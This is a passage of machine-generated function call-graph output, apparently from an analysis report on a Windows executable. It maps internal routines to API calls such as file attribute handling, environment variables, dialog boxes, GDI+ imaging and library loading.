24206->24213 24207 37fbbc CatchGuardHandler 5 API calls 24208 38ba89 24207->24208 24208->24175 24208->24178 24210 38bc72 GetCPInfo 24209->24210 24209->24211 24210->24211 24210->24213 24211->24207 24221 38b893 GetCPInfo 24213->24221 24214->24171 24215->24171 24217->24188 24218->24188 24219->24202 24220->24201 24222 38b977 24221->24222 24226 38b8cd 24221->24226 24225 37fbbc CatchGuardHandler 5 API calls 24222->24225 24228 38ba23 24225->24228 24231 38c988 24226->24231 24228->24211 24230 38ab78 __vsnwprintf_l 43 API calls 24230->24222 24232 384636 __fassign 38 API calls 24231->24232 24233 38c9a8 MultiByteToWideChar 24232->24233 24235 38c9e6 24233->24235 24236 38ca7e 24233->24236 24238 38ca07 __cftof __vsnwprintf_l 24235->24238 24239 388e06 __vsnwprintf_l 21 API calls 24235->24239 24237 37fbbc CatchGuardHandler 5 API calls 24236->24237 24240 38b92e 24237->24240 24241 38ca78 24238->24241 24243 38ca4c MultiByteToWideChar 24238->24243 24239->24238 24245 38ab78 24240->24245 24250 38abc3 20 API calls _free 24241->24250 24243->24241 24244 38ca68 GetStringTypeW 24243->24244 24244->24241 24246 384636 __fassign 38 API calls 24245->24246 24247 38ab8b 24246->24247 24251 38a95b 24247->24251 24250->24236 24252 38a976 __vsnwprintf_l 24251->24252 24253 38a99c MultiByteToWideChar 24252->24253 24254 38a9c6 24253->24254 24265 38ab50 24253->24265 24255 38a9e7 __vsnwprintf_l 24254->24255 24259 388e06 __vsnwprintf_l 21 API calls 24254->24259 24258 38aa30 MultiByteToWideChar 24255->24258 24261 38aa9c 24255->24261 24256 37fbbc CatchGuardHandler 5 API calls 24257 38ab63 24256->24257 24257->24230 24260 38aa49 24258->24260 24258->24261 24259->24255 24278 38af6c 24260->24278 24287 38abc3 20 API calls _free 24261->24287 24265->24256 24266 38aaab 24268 388e06 __vsnwprintf_l 21 API calls 24266->24268 24272 38aacc __vsnwprintf_l 24266->24272 24267 38aa73 24267->24261 24269 38af6c __vsnwprintf_l 11 API calls 24267->24269 24268->24272 24269->24261 24270 38ab41 24286 38abc3 20 API calls _free 24270->24286 24272->24270 24273 38af6c __vsnwprintf_l 11 API calls 24272->24273 24274 38ab20 24273->24274 24274->24270 24275 38ab2f WideCharToMultiByte 24274->24275 24275->24270 24276 38ab6f 24275->24276 24288 38abc3 20 API calls _free 24276->24288 24279 38ac98 _abort 5 API calls 24278->24279 24280 38af93 24279->24280 24283 38af9c 24280->24283 24289 38aff4 10 API calls 3 library calls 24280->24289 24282 38afdc LCMapStringW 24282->24283 24284 37fbbc CatchGuardHandler 5 API calls 24283->24284 24285 38aa60 24284->24285 24285->24261 24285->24266 24285->24267 24286->24261 24287->24265 24288->24261 24289->24282 25354 387f6e 52 API calls 3 library calls 25284 37c793 107 API calls 5 library calls 25285 37e455 14 API calls ___delayLoadHelper2@8 25193 37cd58 25195 37ce22 25193->25195 25200 37cd7b _wcschr 25193->25200 25194 37b314 ExpandEnvironmentStringsW 25209 37c793 _wcslen _wcsrchr 25194->25209 25195->25209 25221 37d78f 25195->25221 25197 37d40a 25199 371fbb CompareStringW 25199->25200 25200->25195 25200->25199 25201 37ca67 SetWindowTextW 25201->25209 25204 383e3e 22 API calls 25204->25209 25206 37c855 SetFileAttributesW 25207 37c90f GetFileAttributesW 25206->25207 25219 37c86f __cftof _wcslen 25206->25219 25207->25209 25211 37c921 DeleteFileW 25207->25211 25209->25194 25209->25197 25209->25201 25209->25204 25209->25206 25212 37cc31 GetDlgItem SetWindowTextW SendMessageW 25209->25212 25216 37cc71 SendMessageW 25209->25216 25220 371fbb CompareStringW 25209->25220 25243 37a64d GetCurrentDirectoryW 25209->25243 25245 36a5d1 6 API calls 25209->25245 25246 36a55a FindClose 25209->25246 25247 37b48e 76 API calls 2 library calls 25209->25247 25211->25209 25213 37c932 25211->25213 25212->25209 25214 364092 _swprintf 51 API calls 25213->25214 25215 37c952 GetFileAttributesW 25214->25215 25215->25213 25217 37c967 MoveFileW 25215->25217 25216->25209 25217->25209 25218 37c97f MoveFileExW 25217->25218 25218->25209 25219->25207 25219->25209 25244 36b991 51 API calls 3 library calls 25219->25244 25220->25209 25225 37d799 __cftof _wcslen 25221->25225 25222 37d9e7 25222->25209 25223 37d9c0 25223->25222 25228 37d9de ShowWindow 25223->25228 25224 37d8a5 25227 36a231 3 API calls 25224->25227 25225->25222 25225->25223 25225->25224 25248 371fbb CompareStringW 25225->25248 25229 37d8ba 25227->25229 25228->25222 25231 37d8d1 25229->25231 25249 36b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25229->25249 25231->25222 25232 37d925 25231->25232 25233 37d97b CloseHandle 25231->25233 25238 37d91b ShowWindow 25231->25238 25250 37dc3b 6 API calls 25232->25250 25234 37d989 25233->25234 25235 37d994 25233->25235 25251 371fbb CompareStringW 25234->25251 25235->25223 25238->25232 25239 37d93d 25239->25233 25240 37d950 GetExitCodeProcess 25239->25240 25240->25233 25241 37d963 25240->25241 25241->25233 25243->25209 25244->25219 25245->25209 25246->25209 25247->25209 25248->25224 25249->25231 25250->25239 25251->25235 25287 37a440 GdipCloneImage GdipAlloc 25336 383a40 5 API calls CatchGuardHandler 25356 391f40 CloseHandle 23361 37f3b2 23362 37f3be ___scrt_is_nonwritable_in_current_image 23361->23362 23393 37eed7 23362->23393 23364 37f3c5 23365 37f518 23364->23365 23368 37f3ef 23364->23368 23466 37f838 4 API calls 2 library calls 23365->23466 23367 37f51f 23459 387f58 23367->23459 23379 37f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23368->23379 23404 388aed 23368->23404 23375 37f40e 23377 37f48f 23412 37f953 GetStartupInfoW __cftof 23377->23412 23379->23377 23462 387af4 38 API calls 2 library calls 23379->23462 23380 37f495 23413 388a3e 51 API calls 23380->23413 23383 37f49d 23414 37df1e 23383->23414 23387 37f4b1 23387->23367 23388 37f4b5 23387->23388 23389 37f4be 23388->23389 23464 387efb 28 API calls _abort 23388->23464 23465 37f048 12 API calls ___scrt_uninitialize_crt 23389->23465 23392 37f4c6 23392->23375 23394 37eee0 23393->23394 23468 37f654 IsProcessorFeaturePresent 23394->23468 23396 37eeec 23469 382a5e 23396->23469 23398 37eef1 23403 37eef5 23398->23403 23477 388977 23398->23477 23401 37ef0c 23401->23364 23403->23364 23406 388b04 23404->23406 23405 37fbbc CatchGuardHandler 5 API calls 23407 37f408 23405->23407 23406->23405 23407->23375 23408 388a91 23407->23408 23409 388ac0 23408->23409 23410 37fbbc CatchGuardHandler 5 API calls 23409->23410 23411 388ae9 23410->23411 23411->23379 23412->23380 23413->23383 23536 370863 23414->23536 23418 37df3d 23585 37ac16 23418->23585 23420 37df46 __cftof 23421 37df59 GetCommandLineW 23420->23421 23422 37dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23421->23422 23423 37df68 23421->23423 23600 364092 23422->23600 23589 37c5c4 23423->23589 23429 37df76 OpenFileMappingW 23432 37dfd6 CloseHandle 23429->23432 23433 37df8f MapViewOfFile 23429->23433 23430 37dfe0 23594 37dbde 23430->23594 23432->23422 23436 37dfa0 __InternalCxxFrameHandler 23433->23436 23437 37dfcd UnmapViewOfFile 23433->23437 23441 37dbde 2 API calls 23436->23441 23437->23432 23443 37dfbc 23441->23443 23442 3790b7 8 API calls 23444 37e0aa DialogBoxParamW 23442->23444 23443->23437 23445 37e0e4 23444->23445 23446 37e0f6 Sleep 23445->23446 23447 37e0fd 23445->23447 23446->23447 23448 37e10b 23447->23448 23633 37ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23447->23633 23450 37e12a DeleteObject 23448->23450 23451 37e146 23450->23451 23452 37e13f DeleteObject 23450->23452 23453 37e177 23451->23453 23454 37e189 23451->23454 23452->23451 23634 37dc3b 6 API calls 23453->23634 23630 37ac7c 23454->23630 23456 37e17d CloseHandle 23456->23454 23458 37e1c3 23463 37f993 GetModuleHandleW 23458->23463 23926 387cd5 23459->23926 23462->23377 23463->23387 23464->23389 23465->23392 23466->23367 23468->23396 23481 383b07 23469->23481 23473 382a6f 23474 382a7a 23473->23474 23495 383b43 DeleteCriticalSection 23473->23495 23474->23398 23476 382a67 23476->23398 23524 38c05a 23477->23524 23480 382a7d 7 API calls 2 library calls 23480->23403 23482 383b10 23481->23482 23484 383b39 23482->23484 23486 382a63 23482->23486 23496 383d46 23482->23496 23501 383b43 DeleteCriticalSection 23484->23501 23486->23476 23487 382b8c 23486->23487 23517 383c57 23487->23517 23490 382ba1 23490->23473 23492 382baf 23493 382bbc 23492->23493 23523 382bbf 6 API calls ___vcrt_FlsFree 23492->23523 23493->23473 23495->23476 23502 383c0d 23496->23502 23499 383d69 23499->23482 23500 383d7e InitializeCriticalSectionAndSpinCount 23500->23499 23501->23486 23503 383c4f 23502->23503 23504 383c26 23502->23504 23503->23499 23503->23500 23504->23503 23509 383b72 23504->23509 23507 383c3b GetProcAddress 23507->23503 23508 383c49 23507->23508 23508->23503 23515 383b7e ___vcrt_FlsFree 23509->23515 23510 383bf3 23510->23503 23510->23507 23511 383b95 LoadLibraryExW 23512 383bfa 23511->23512 23513 383bb3 GetLastError 23511->23513 23512->23510 23514 383c02 FreeLibrary 23512->23514 23513->23515 23514->23510 23515->23510 23515->23511 23516 383bd5 LoadLibraryExW 23515->23516 23516->23512 23516->23515 23518 383c0d ___vcrt_FlsFree 5 API calls 23517->23518 23519 383c71 23518->23519 23520 383c8a TlsAlloc 23519->23520 23521 382b96 23519->23521 23521->23490 23522 383d08 6 API calls ___vcrt_FlsFree 23521->23522 23522->23492 23523->23490 23527 38c073 23524->23527 23526 37eefe 23526->23401 23526->23480 23528 37fbbc 23527->23528 23529 37fbc5 IsProcessorFeaturePresent 23528->23529 23530 37fbc4 23528->23530 23532 37fc07 23529->23532 23530->23526 23535 37fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23532->23535 23534 37fcea 23534->23526 23535->23534 23635 37ec50 23536->23635 23539 3708e7 23541 370c14 GetModuleFileNameW 23539->23541 23646 3875fb 42 API calls __vsnwprintf_l 23539->23646 23540 370888 GetProcAddress 23542 3708a1 23540->23542 23543 3708b9 GetProcAddress 23540->23543 23552 370c32 23541->23552 23542->23543 23545 3708cb 23543->23545 23545->23539 23546 370b54 23546->23541 23547 370b5f GetModuleFileNameW CreateFileW 23546->23547 23548 370b8f SetFilePointer 23547->23548 23549 370c08 CloseHandle 23547->23549 23548->23549 23550 370b9d ReadFile 23548->23550 23549->23541 23550->23549 23554 370bbb 23550->23554 23555 370c94 GetFileAttributesW 23552->23555 23557 370c5d CompareStringW 23552->23557 23558 370cac 23552->23558 23637 36b146 23552->23637 23640 37081b 23552->23640 23554->23549 23556 37081b 2 API calls 23554->23556 23555->23552 23555->23558 23556->23554 23557->23552 23559 370cb7 23558->23559 23562 370cec 23558->23562 23561 370cd0 GetFileAttributesW 23559->23561 23563 370ce8 23559->23563 23560 370dfb 23584 37a64d GetCurrentDirectoryW 23560->23584 23561->23559 23561->23563 23562->23560 23564 36b146 GetVersionExW 23562->23564 23563->23562 23565 370d06 23564->23565 23566 370d73 23565->23566 23567 370d0d 23565->23567 23569 364092 _swprintf 51 API calls 23566->23569 23568 37081b 2 API calls 23567->23568 23570 370d17 23568->23570 23571 370d9b AllocConsole 23569->23571 23574 37081b 2 API calls 23570->23574 23572 370df3 ExitProcess 23571->23572 23573 370da8 GetCurrentProcessId AttachConsole 23571->23573 23651 383e13 23573->23651 23576 370d21 23574->23576 23647 36e617 23576->23647 23577 370dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23577->23572 23580 364092 _swprintf 51 API calls 23581 370d4f 23580->23581 23582 36e617 53 API calls 23581->23582 23583 370d5e 23582->23583 23583->23572 23584->23418 23586 37081b 2 API calls 23585->23586 23587 37ac2a OleInitialize 23586->23587 23588 37ac4d GdiplusStartup SHGetMalloc 23587->23588 23588->23420 23593 37c5ce 23589->23593 23590 37c6e4 23590->23429 23590->23430 23591 371fac CharUpperW 23591->23593 23593->23590 23593->23591 23676 36f3fa 82 API calls 2 library calls 23593->23676 23595 37ec50 23594->23595 23596 37dbeb SetEnvironmentVariableW 23595->23596 23598 37dc0e 23596->23598 23597 37dc36 23597->23422 23598->23597 23599 37dc2a SetEnvironmentVariableW 23598->23599 23599->23597 23677 364065 23600->23677 23603 37b6dd LoadBitmapW 23604 37b6fe 23603->23604 23605 37b70b GetObjectW 23603->23605 23754 37a6c2 FindResourceW 23604->23754 23607 37b71a 23605->23607 23749 37a5c6 23607->23749 23611 37b770 23622 36da42 23611->23622 23612 37b74c 23768 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23612->23768 23614 37a6c2 12 API calls 23615 37b73d 23614->23615 23615->23612 23617 37b743 DeleteObject 23615->23617 23616 37b754 23769 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23616->23769 23617->23612 23619 37b75d 23770 37a80c 8 API calls 23619->23770 23621 37b764 DeleteObject 23621->23611 23781 36da67 23622->23781 23627 3790b7 23914 37eb38 23627->23914 23631 37acab GdiplusShutdown CoUninitialize 23630->23631 23631->23458 23633->23448 23634->23456 23636 37086d GetModuleHandleW 23635->23636 23636->23539 23636->23540 23638 36b196 23637->23638 23639 36b15a GetVersionExW 23637->23639 23638->23552 23639->23638 23641 37ec50 23640->23641 23642 370828 GetSystemDirectoryW 23641->23642 23643 37085e 23642->23643 23644 370840 23642->23644 23643->23552 23645 370851 LoadLibraryW 23644->23645 23645->23643 23646->23546 23648 36e627 23647->23648 23653 36e648 23648->23653 23652 383e1b 23651->23652 23652->23577 23652->23652 23659 36d9b0 23653->23659 23656 36e645 23656->23580 23657 36e66b LoadStringW 23657->23656 23658 36e682 LoadStringW 23657->23658 23658->23656 23664 36d8ec 23659->23664 23661 36d9cd 23662 36d9e2 23661->23662 23672 36d9f0 26 API calls 23661->23672 23662->23656 23662->23657 23665 36d904 23664->23665 23671 36d984 _strncpy 23664->23671 23667 36d928 23665->23667 23673 371da7 WideCharToMultiByte 23665->23673 23670 36d959 23667->23670 23674 36e5b1 50 API calls __vsnprintf 23667->23674 23675 386159 26 API calls 3 library calls 23670->23675 23671->23661 23672->23662 23673->23667 23674->23670 23675->23671 23676->23593 23678 36407c __vswprintf_c_l 23677->23678 23681 385fd4 23678->23681 23684 384097 23681->23684 23685 3840bf 23684->23685 23686 3840d7 23684->23686 23701 3891a8 20 API calls _abort 23685->23701 23686->23685 23688 3840df 23686->23688 23703 384636 23688->23703 23689 3840c4 23702 389087 26 API calls _abort 23689->23702 23693 37fbbc CatchGuardHandler 5 API calls 23696 364086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23693->23696 23695 384167 23712 3849e6 51 API calls 3 library calls 23695->23712 23696->23603 23699 3840cf 23699->23693 23700 384172 23713 3846b9 20 API calls _free 23700->23713 23701->23689 23702->23699 23704 384653 23703->23704 23705 3840ef 23703->23705 23704->23705 23714 3897e5 GetLastError 23704->23714 23711 384601 20 API calls 2 library calls 23705->23711 23707 384674 23735 38993a 38 API calls __fassign 23707->23735 23709 38468d 23736 389967 38 API calls __fassign 23709->23736 23711->23695 23712->23700 23713->23699 23715 3897fb 23714->23715 23716 389807 23714->23716 23737 38ae5b 11 API calls 2 library calls 23715->23737 23738 38b136 20 API calls 2 library calls 23716->23738 23719 389813 23721 38981b 23719->23721 23745 38aeb1 11 API calls 2 library calls 23719->23745 23720 389801 23720->23716 23722 389850 SetLastError 23720->23722 23739 388dcc 23721->23739 23722->23707 23725 389830 23725->23721 23727 389837 23725->23727 23726 389821 23728 38985c SetLastError 23726->23728 23746 389649 20 API calls _abort 23727->23746 23747 388d24 38 API calls _abort 23728->23747 23731 389842 23733 388dcc _free 20 API calls 23731->23733 23734 389849 23733->23734 23734->23722 23734->23728 23735->23709 23736->23705 23737->23720 23738->23719 23740 388e00 __dosmaperr 23739->23740 23741 388dd7 RtlFreeHeap 23739->23741 23740->23726 23741->23740 23742 388dec 23741->23742 23748 3891a8 20 API calls _abort 23742->23748 23744 388df2 GetLastError 23744->23740 23745->23725 23746->23731 23748->23744 23771 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23749->23771 23751 37a5cd 23752 37a5d9 23751->23752 23772 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23751->23772 23752->23611 23752->23612 23752->23614 23755 37a6e5 SizeofResource 23754->23755 23756 37a7d3 23754->23756 23755->23756 23757 37a6fc LoadResource 23755->23757 23756->23605 23756->23607 23757->23756 23758 37a711 LockResource 23757->23758 23758->23756 23759 37a722 GlobalAlloc 23758->23759 23759->23756 23760 37a73d GlobalLock 23759->23760 23761 37a7cc GlobalFree 23760->23761 23762 37a74c __InternalCxxFrameHandler 23760->23762 23761->23756 23763 37a7c5 GlobalUnlock 23762->23763 23773 37a626 GdipAlloc 23762->23773 23763->23761 23766 37a79a GdipCreateHBITMAPFromBitmap 23767 37a7b0 23766->23767 23767->23763 23768->23616 23769->23619 23770->23621 23771->23751 23772->23752 23774 37a645 23773->23774 23775 37a638 23773->23775 23774->23763 23774->23766 23774->23767 23777 37a3b9 23775->23777 23778 37a3e1 GdipCreateBitmapFromStream 23777->23778 23779 37a3da GdipCreateBitmapFromStreamICM 23777->23779 23780 37a3e6 23778->23780 23779->23780 23780->23774 23782 36da75 _wcschr __EH_prolog 23781->23782 23783 36daa4 GetModuleFileNameW 23782->23783 23784 36dad5 23782->23784 23785 36dabe 23783->23785 23827 3698e0 23784->23827 23785->23784 23787 36db31 23838 386310 23787->23838 23789 36e261 78 API calls 23792 36db05 23789->23792 23792->23787 23792->23789 23805 36dd4a 23792->23805 23793 36db44 23794 386310 26 API calls 23793->23794 23802 36db56 ___vcrt_FlsFree 23794->23802 23795 36dc85 23795->23805 23874 369d70 81 API calls 23795->23874 23799 36dc9f ___std_exception_copy 23800 369bd0 82 API calls 23799->23800 23799->23805 23803 36dcc8 ___std_exception_copy 23800->23803 23802->23795 23802->23805 23852 369e80 23802->23852 23868 369bd0 23802->23868 23873 369d70 81 API calls 23802->23873 23803->23805 23823 36dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 23803->23823 23875 371b84 MultiByteToWideChar 23803->23875 23861 36959a 23805->23861 23806 36e159 23813 36e1de 23806->23813 23881 388cce 26 API calls 2 library calls 23806->23881 23809 36e16e 23882 387625 26 API calls 2 library calls 23809->23882 23811 36e1c6 23883 36e27c 78 API calls 23811->23883 23812 36e214 23816 386310 26 API calls 23812->23816 23813->23812 23815 36e261 78 API calls 23813->23815 23815->23813 23817 36e22d 23816->23817 23818 386310 26 API calls 23817->23818 23818->23805 23820 371da7 WideCharToMultiByte 23820->23823 23823->23805 23823->23806 23823->23820 23876 36e5b1 50 API calls __vsnprintf 23823->23876 23877 386159 26 API calls 3 library calls 23823->23877 23878 388cce 26 API calls 2 library calls 23823->23878 23879 387625 26 API calls 2 library calls 23823->23879 23880 36e27c 78 API calls 23823->23880 23825 36e29e GetModuleHandleW FindResourceW 23826 36da55 23825->23826 23826->23627 23828 3698ea 23827->23828 23829 36994b CreateFileW 23828->23829 23830 36996c GetLastError 23829->23830 23833 3699bb 23829->23833 23884 36bb03 23830->23884 23832 36998c 23832->23833 23835 369990 CreateFileW GetLastError 23832->23835 23834 3699ff 23833->23834 23836 3699e5 SetFileTime 23833->23836 23834->23792 23835->23833 23837 3699b5 23835->23837 23836->23834 23837->23833 23839 386349 23838->23839 23840 38634d 23839->23840 23851 386375 23839->23851 23888 3891a8 20 API calls _abort 23840->23888 23842 386352 23889 389087 26 API calls _abort 23842->23889 23843 386699 23845 37fbbc CatchGuardHandler 5 API calls 23843->23845 23847 3866a6 23845->23847 23846 38635d 23848 37fbbc CatchGuardHandler 5 API calls 23846->23848 23847->23793 23850 386369 23848->23850 23850->23793 23851->23843 23890 386230 5 API calls CatchGuardHandler 23851->23890 23853 369ea5 23852->23853 23854 369e92 23852->23854 23856 369eb8 SetFilePointer 23853->23856 23858 369eb0 23853->23858 23854->23858 23891 366d5b 77 API calls 23854->23891 23857 369ed4 GetLastError 23856->23857 23856->23858 23857->23858 23859 369ede 23857->23859 23858->23802 23859->23858 23892 366d5b 77 API calls 23859->23892 23862 3695be 23861->23862 23867 3695cf 23861->23867 23863 3695d1 23862->23863 23864 3695ca 23862->23864 23862->23867 23898 369620 23863->23898 23893 36974e 23864->23893 23867->23825 23869 369bdc 23868->23869 23872 369be3 23868->23872 23869->23802 23871 369785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23871->23872 23872->23869 23872->23871 23913 366d1a 77 API calls 23872->23913 23873->23802 23874->23799 23875->23823 23876->23823 23877->23823 23878->23823 23879->23823 23880->23823 23881->23809 23882->23811 23883->23813 23885 36bb10 _wcslen 23884->23885 23886 36bbb8 GetCurrentDirectoryW 23885->23886 23887 36bb39 _wcslen 23885->23887 23886->23887 23887->23832 23888->23842 23889->23846 23890->23851 23891->23853 23892->23858 23894 369757 23893->23894 23895 369781 23893->23895 23894->23895 23904 36a1e0 23894->23904 23895->23867 23899 36962c 23898->23899 23902 36964a 23898->23902 23901 369638 CloseHandle 23899->23901 23899->23902 23900 369669 23900->23867 23901->23902 23902->23900 23912 366bd5 76 API calls 23902->23912 23905 37ec50 23904->23905 23906 36a1ed DeleteFileW 23905->23906 23907 36a200 23906->23907 23908 36977f 23906->23908 23909 36bb03 GetCurrentDirectoryW 23907->23909 23908->23867 23910 36a214 23909->23910 23910->23908 23911 36a218 DeleteFileW 23910->23911 23911->23908 23912->23900 23913->23872 23915 37eb3d ___std_exception_copy 23914->23915 23916 3790d6 23915->23916 23919 37eb59 23915->23919 23923 387a5e 7 API calls 2 library calls 23915->23923 23916->23442 23918 37f5c9 23925 38238d RaiseException 23918->23925 23919->23918 23924 38238d RaiseException 23919->23924 23922 37f5e6 23923->23915 23924->23918 23925->23922 23927 387ce1 _unexpected 23926->23927 23928 387ce8 23927->23928 23929 387cfa 23927->23929 23962 387e2f GetModuleHandleW 23928->23962 23950 38ac31 EnterCriticalSection 23929->23950 23932 387ced 23932->23929 23963 387e73 GetModuleHandleExW 23932->23963 23933 387d9f 23951 387ddf 23933->23951 23937 387d76 23942 387d8e 23937->23942 23943 388a91 _abort 5 API calls 23937->23943 23939 387d01 23939->23933 23939->23937 23971 3887e0 20 API calls _abort 23939->23971 23940 387de8 23972 392390 5 API calls CatchGuardHandler 23940->23972 23941 387dbc 23954 387dee 23941->23954 23944 388a91 _abort 5 API calls 23942->23944 23943->23942 23944->23933 23950->23939 23973 38ac81 LeaveCriticalSection 23951->23973 23953 387db8 23953->23940 23953->23941 23974 38b076 23954->23974 23957 387e1c 23960 387e73 _abort 8 API calls 23957->23960 23958 387dfc GetPEB 23958->23957 23959 387e0c GetCurrentProcess TerminateProcess 23958->23959 23959->23957 23961 387e24 ExitProcess 23960->23961 23962->23932 23964 387e9d GetProcAddress 23963->23964 23965 387ec0 23963->23965 23968 387eb2 23964->23968 23966 387ecf 23965->23966 23967 387ec6 FreeLibrary 23965->23967 23969 37fbbc CatchGuardHandler 5 API calls 23966->23969 23967->23966 23968->23965 23970 387cf9 23969->23970 23970->23929 23971->23937 23973->23953 23975 38b09b 23974->23975 23976 38b091 23974->23976 23980 38ac98 23975->23980 23978 37fbbc CatchGuardHandler 5 API calls 23976->23978 23979 387df8 23978->23979 23979->23957 23979->23958 23981 38acc8 23980->23981 23984 38acc4 23980->23984 23981->23976 23982 38ace8 23982->23981 23985 38acf4 GetProcAddress 23982->23985 23984->23981 23984->23982 23987 38ad34 23984->23987 23986 38ad04 _abort 23985->23986 23986->23981 23988 38ad55 LoadLibraryExW 23987->23988 23993 38ad4a 23987->23993 23989 38ad72 GetLastError 23988->23989 23992 38ad8a 23988->23992 23990 38ad7d LoadLibraryExW 23989->23990 23989->23992 23990->23992 23991 38ada1 FreeLibrary 23991->23993 23992->23991 23992->23993 23993->23984 23994 37e5b1 23995 37e578 23994->23995 23997 37e85d 23995->23997 24023 37e5bb 23997->24023 23999 37e86d 24000 37e8ca 23999->24000 24012 37e8ee 23999->24012 24001 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24000->24001 24002 37e8d5 RaiseException 24001->24002 24003 37eac3 24002->24003 24003->23995 24004 37e966 LoadLibraryExA 24005 37e9c7 24004->24005 24006 37e979 GetLastError 24004->24006 24007 37e9d2 FreeLibrary 24005->24007 24011 37e9d9 24005->24011 24008 37e9a2 24006->24008 24009 37e98c 24006->24009 24007->24011 24013 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24008->24013 24009->24005 24009->24008 24010 37ea37 GetProcAddress 24014 37ea47 GetLastError 24010->24014 24018 37ea95 24010->24018 24011->24010 24011->24018 24012->24004 24012->24005 24012->24011 24012->24018 24015 37e9ad RaiseException 24013->24015 24016 37ea5a 24014->24016 24015->24003 24016->24018 24019 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24016->24019 24032 37e7fb 24018->24032 24020 37ea7b RaiseException 24019->24020 24021 37e5bb ___delayLoadHelper2@8 6 API calls 24020->24021 24022 37ea92 24021->24022 24022->24018 24024 37e5c7 24023->24024 24025 37e5ed 24023->24025 24040 37e664 24024->24040 24025->23999 24027 37e5cc 24028 37e5e8 24027->24028 24043 37e78d 24027->24043 24048 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24028->24048 24031 37e836 24031->23999 24033 37e82f 24032->24033 24034 37e80d 24032->24034 24033->24003 24035 37e664 DloadReleaseSectionWriteAccess 3 API calls 24034->24035 24036 37e812 24035->24036 24037 37e82a 24036->24037 24038 37e78d DloadProtectSection 3 API calls 24036->24038 24051 37e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24037->24051 24038->24037 24049 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24040->24049 24042 37e669 24042->24027 24045 37e7a2 DloadProtectSection 24043->24045 24044 37e7dd VirtualProtect 24046 37e7a8 24044->24046 24045->24044 24045->24046 24050 37e6a3 VirtualQuery GetSystemInfo 24045->24050 24046->24028 24048->24031 24049->24042 24050->24044 24051->24033 25317 37b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25357 371bbd GetCPInfo IsDBCSLeadByte 25319 37eda7 48 API calls _unexpected 25289 37dca1 DialogBoxParamW 25359 37f3a0 27 API calls 25292 38a4a0 71 API calls _free 25337 38a6a0 31 API calls 2 library calls 25293 3908a0 IsProcessorFeaturePresent 25360 366faa 111 API calls 3 library calls 25295 38b49d 6 API calls CatchGuardHandler 25338 37c793 102 API calls 5 library calls 25322 379580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25323 37b18d 78 API calls 25297 37c793 97 API calls 4 library calls 25299 382cfb 38 API calls 4 library calls 25324 3695f0 80 API calls 25325 37fd4f 9 API calls 2 library calls 25339 365ef0 82 API calls 24088 3898f0 24096 38adaf 24088->24096 24091 389904 24093 38990c 24094 389919 24093->24094 24104 389920 11 API calls 24093->24104 24097 38ac98 _abort 5 API calls 24096->24097 24098 38add6 24097->24098 24099 38adee TlsAlloc 24098->24099 24100 38addf 24098->24100 24099->24100 24101 37fbbc CatchGuardHandler 5 API calls 24100->24101 24102 3898fa 24101->24102 24102->24091 24103 389869 20 API calls 2 library calls 24102->24103 24103->24093 24104->24091 24105 38abf0 24106 38abfb 24105->24106 24108 38ac24 24106->24108 24109 38ac20 24106->24109 24111 38af0a 24106->24111 24118 38ac50 DeleteCriticalSection 24108->24118 24112 38ac98 _abort 5 API calls 24111->24112 24113 38af31 24112->24113 24114 38af4f InitializeCriticalSectionAndSpinCount 24113->24114 24115 38af3a 24113->24115 24114->24115 24116 37fbbc CatchGuardHandler 5 API calls 24115->24116 24117 38af66 24116->24117 24117->24106 24118->24109 25300 3888f0 7 API calls ___scrt_uninitialize_crt 24290 37eae7 24291 37eaf1 24290->24291 24292 37e85d ___delayLoadHelper2@8 14 API calls 24291->24292 24293 37eafe 24292->24293 25301 37f4e7 29 API calls _abort 24295 37b7e0 24296 37b7ea __EH_prolog 24295->24296 24461 361316 24296->24461 24299 37b841 24300 37bf0f 24526 37d69e 24300->24526 24301 37b82a 24301->24299 24303 37b89b 24301->24303 24304 37b838 24301->24304 24306 37b92e GetDlgItemTextW 24303->24306 24314 37b8b1 24303->24314 24307 37b83c 24304->24307 24308 37b878 24304->24308 24306->24308 24313 37b96b 24306->24313 24307->24299 24319 36e617 53 API calls 24307->24319 24308->24299 24316 37b95f KiUserCallbackDispatcher 24308->24316 24309 37bf2a SendMessageW 24310 37bf38 24309->24310 24311 37bf52 GetDlgItem SendMessageW 24310->24311 24312 37bf41 SendDlgItemMessageW 24310->24312 24544 37a64d GetCurrentDirectoryW 24311->24544 24312->24311 24317 37b980 GetDlgItem 24313->24317 24459 37b974 24313->24459 24318 36e617 53 API calls 24314->24318 24316->24299 24321 37b9b7 SetFocus 24317->24321 24322 37b994 SendMessageW SendMessageW 24317->24322 24323 37b8ce SetDlgItemTextW 24318->24323 24324 37b85b 24319->24324 24320 37bf82 GetDlgItem 24326 37bfa5 SetWindowTextW 24320->24326 24327 37bf9f 24320->24327 24328 37b9c7 24321->24328 24339 37b9e0 24321->24339 24322->24321 24329 37b8d9 24323->24329 24566 36124f SHGetMalloc 24324->24566 24545 37abab GetClassNameW 24326->24545 24327->24326 24333 36e617 53 API calls 24328->24333 24329->24299 24336 37b8e6 GetMessageW 24329->24336 24330 37b862 24330->24299 24338 37c1fc SetDlgItemTextW 24330->24338 24331 37be55 24334 36e617 53 API calls 24331->24334 24337 37b9d1 24333->24337 24340 37be65 SetDlgItemTextW 24334->24340 24336->24299 24342 37b8fd IsDialogMessageW 24336->24342 24567 37d4d4 